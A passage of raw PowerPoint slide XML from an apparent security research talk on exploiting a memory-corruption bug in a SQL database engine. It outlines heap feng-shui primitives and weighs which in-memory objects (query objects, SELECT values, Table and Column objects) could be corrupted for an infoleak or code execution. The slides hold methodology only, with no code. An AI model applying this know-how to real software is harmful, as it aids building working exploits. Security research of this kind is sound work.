                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Shui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> primitive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>infoleak</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Experiment, Verify, by manually corrupting the objects with a debugger</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3512433321"/>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Current status</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Study all prior public research on the subject. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Collect primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uh oh. I have to build all of these </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>↓</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>↓</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>↓</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>↓</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ↓</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on my own…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ery Good* Heap Feng-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Shui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> primitive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>infoleak</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Experiment, Verify, by manually corrupting the objects with a debugger</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2645406097"/>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Finding the right object to corrupt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1600246598"/>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Finding the right object to corrupt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="11049000" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> values?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The SQL query itself?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The objects that represent the table values on the SELECT statement?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Nested SQL queries?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="458393559"/>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Finding the right object to corrupt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="11049000" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> values?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They’re in the page cache. Can’t allocate/deallocate at free will</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The SQL query itself?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It’s discarded immediately after the query is finished executing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The objects that represent the table values on the SELECT statement?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They’re discarded immediately after the SELECT statement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>finishses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Nested SQL queries?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can’t make a good heap spray primitive. All deallocated upon SQL query completion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="860008979"/>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Finding the right object to corrupt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="11049000" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> values?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They’re in the page cache. Can’t allocate/deallocate at free will</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The SQL query itself?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It’s discarded immediately after the query is finished executing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The objects that represent the table values on the SELECT statement?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They’re discarded immediately after the SELECT statement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>finishses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Nested SQL queries?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can’t make a good heap spray primitive. All deallocated upon SQL query completion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Table and Column object?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2968775165"/>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Finding the right object to corrupt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="11049000" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> values?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They’re in the page cache. Can’t allocate/deallocate at free will</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The SQL query itself?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It’s discarded immediately after the query is finished executing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The objects that represent the table values on the SELECT statement?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
